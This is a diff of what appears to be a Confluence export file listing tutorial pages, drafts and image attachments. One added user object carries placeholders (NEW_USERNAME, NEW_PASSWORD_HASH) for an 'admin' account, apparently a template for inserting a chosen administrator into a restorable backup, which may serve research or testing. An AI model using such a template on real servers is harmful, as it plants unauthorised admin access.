+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196614</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196617</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196619</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196620</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262151</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262165</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.780</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98343</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">8</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98305</id>
+<property name="hibernateVersion">24</property>
+<property name="title"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163847</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196615</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196618</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196622</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196623</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196626</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262161</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262164</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.784</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98344</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">7</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98310</id>
+<property name="hibernateVersion">11</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262180</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.788</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98309</id>
+<property name="hibernateVersion">11</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262186</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.792</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98308</id>
+<property name="hibernateVersion">16</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262174</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.804</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98307</id>
+<property name="hibernateVersion">16</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262176</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.879</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="InternalUser" package="com.atlassian.crowd.model.user">
+<id name="id">491521</id>
+<property name="name"><![CDATA[NEW_USERNAME]]></property>
+<property name="lowerName"><![CDATA[NEW_USERNAME_LOWER]]></property>
+<property name="active">true</property>
+<property name="createdDate">2023-11-09 06:04:18.716</property>
+<property name="updatedDate">2023-11-09 06:04:18.716</property>
+<property name="firstName"><![CDATA[]]></property>
+<property name="lowerFirstName"><![CDATA[]]></property>
+<property name="lastName"><![CDATA[admin]]></property>
+<property name="lowerLastName"><![CDATA[admin]]></property>
+<property name="displayName"><![CDATA[admin]]></property>
+<property name="lowerDisplayName"><![CDATA[admin]]></property>
+<property name="emailAddress"><![CDATA[admin@test.com]]></property>
+<property name="lowerEmailAddress"><![CDATA[admin@test.com]]></property>
+<property name="externalId"><![CDATA[d1c26bc5-04d3-4c31-b230-c9454e51186d]]></property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<component name="credential"><property name="credential" type="string"><![CDATA[NEW_PASSWORD_HASH]]></property>
+</component>
+<collection name="credentialRecords" class="java.util.List"><element class="InternalUserCredentialRecord" package="com.atlassian.crowd.model.user"><id name="id">524289</id>
+</element>
+</collection>
+<collection name="attributes" class="java.util.Set"><element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557058</id>
+</element>
+<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557060</id>
+</element>
+<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557057</id>
+</element>
+<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557059</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98330</id>
+<property name="hibernateVersion">14</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262172</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.895</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98341</id>
+<property name="hibernateVersion">18</property>
+<property name="title"><![CDATA[step05-04.png]]></property>
+<property name="lowerTitle"><![CDATA[step05-04.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262254</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262255</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262256</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262260</id>
+</element>
+</collection>
+<property name="version">3</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98329</id>
+<property name="hibernateVersion">14</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262170</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.903</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98342</id>
+<property name="hibernateVersion">18</property>
+<property name="title"><![CDATA[home.jpg]]></property>
+<property name="lowerTitle"><![CDATA[home.jpg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262204</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262223</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262230</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98328</id>
+<property name="hibernateVersion">10</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262187</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.909</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98339</id>
+<property name="hibernateVersion">16</property>
+<property name="title"><![CDATA[step-2-image-5.png]]></property>
+<property name="lowerTitle"><![CDATA[step-2-image-5.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262209</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262212</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262213</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262243</id>
+</element>
+</collection>
+<property name="version">2</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98327</id>
+<property name="hibernateVersion">13</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262190</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.915</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98340</id>
+<property name="hibernateVersion">19</property>
+<property name="title"><![CDATA[step06-image03.png]]></property>
+<property name="lowerTitle"><![CDATA[step06-image03.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262211</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262214</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262224</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262244</id>
+</element>
+</collection>
+<property name="version">2</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98334</id>
+<property name="hibernateVersion">14</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262169</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.921</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98345</id>
+<property name="hibernateVersion">17</property>
+<property name="title"><![CDATA[home.jpg]]></property>
+<property name="lowerTitle"><![CDATA[home.jpg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262226</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262229</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262242</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98333</id>
+<property name="hibernateVersion">13</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262192</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.927</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98346</id>
+<property name="hibernateVersion">19</property>
+<property name="title"><![CDATA[Confluence-Origami-Necktie.jpeg]]></property>
+<property name="lowerTitle"><![CDATA[confluence-origami-necktie.jpeg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262222</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262239</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262240</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98332</id>
+<property name="hibernateVersion">71</property>
+<property name="title"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163846</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196654</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196655</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196656</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196657</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196658</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262149</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262152</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:51.989</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98341</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98351</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98354</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">4</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98343</id>
+<property name="hibernateVersion">18</property>
+<property name="title"><![CDATA[step09-01.png]]></property>
+<property name="lowerTitle"><![CDATA[step09-01.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262246</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262247</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262248</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262265</id>
+</element>
+</collection>
+<property name="version">3</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98331</id>
+<property name="hibernateVersion">10</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262189</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.025</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98344</id>
+<property name="hibernateVersion">17</property>
+<property name="title"><![CDATA[Step8-01.png]]></property>
+<property name="lowerTitle"><![CDATA[step8-01.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262227</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262228</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262258</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262259</id>
+</element>
+</collection>
+<property name="version">2</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98336</id>
+<property name="hibernateVersion">10</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262188</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.030</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98335</id>
+<property name="hibernateVersion">12</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262195</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.033</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98337</id>
+<property name="hibernateVersion">17</property>
+<property name="title"><![CDATA[prev.jpg]]></property>
+<property name="lowerTitle"><![CDATA[prev.jpg]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262236</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262249</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262250</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Attachment" package="com.atlassian.confluence.pages">
+<id name="id">98338</id>
+<property name="hibernateVersion">18</property>
+<property name="title"><![CDATA[welcome.png]]></property>
+<property name="lowerTitle"><![CDATA[welcome.png]]></property>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262235</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262238</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262262</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98314</id>
+<property name="hibernateVersion">37</property>
+<property name="title"><![CDATA[Learn the wonders of autoconvert (step 7 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[learn the wonders of autoconvert (step 7 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163844</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196609</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196610</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196611</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196612</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196613</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196644</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262150</id>
+</element>
